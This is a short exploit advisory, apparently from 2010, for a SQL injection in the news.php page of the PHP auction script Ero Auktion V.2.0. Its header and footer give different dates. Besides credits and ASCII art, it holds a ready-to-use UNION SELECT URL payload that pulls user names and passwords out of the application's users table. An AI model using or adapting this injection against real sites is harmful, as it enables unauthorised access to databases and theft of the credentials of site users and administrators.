1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
2 +Autor : Easy Laster
3 +Date : 21.10.2010
4 +Script : Ero Auktion V.2.0 SQL Injection news.php
5 +Download : −−−−−
6 +Price : 34,90M−^@
7 +Language :PHP
8 +Discovered by Easy Laster
9 +Security Group 4004−Security−Project
10 +Greetz to Team−Internet ,Underground Agents
11 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
12 Kiba,−tmh−,Dr Chaos,HANN!BAL,Kabel,−=Player=−,Lidloses_Auge,
13 N00bor.
14 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
15 ___ ___ ___ ___ _ _ _ _
16 | | | | | | |___ ___ ___ ___ ___|_| |_ _ _ ___ ___ ___ ___ |_|___ ___| |_
17 |_ | | | | |_ |___|_ −| −_| _| _| | _| | |___| . | _| . | | | −_| _| _|
18 |_|___|___| |_| |___|___|___|_| |_|_| |_ | | _|_| |___|_| |___|___|_|
19 |___| |_| |___|
20 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
21 +Vulnerability : www.Site.com/news.php?id=[SQL]
22 +Exploitable : www.site.com/flashauktion/news.php?id=11111111+union+select+1,
23 2,concat%28name,0x3a,password%29,4,5+from+users
24 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
Page 1/1
Ero Auktion v2.0 news.php SQL Injection Vulnerability
Easy Laster
02/22/2010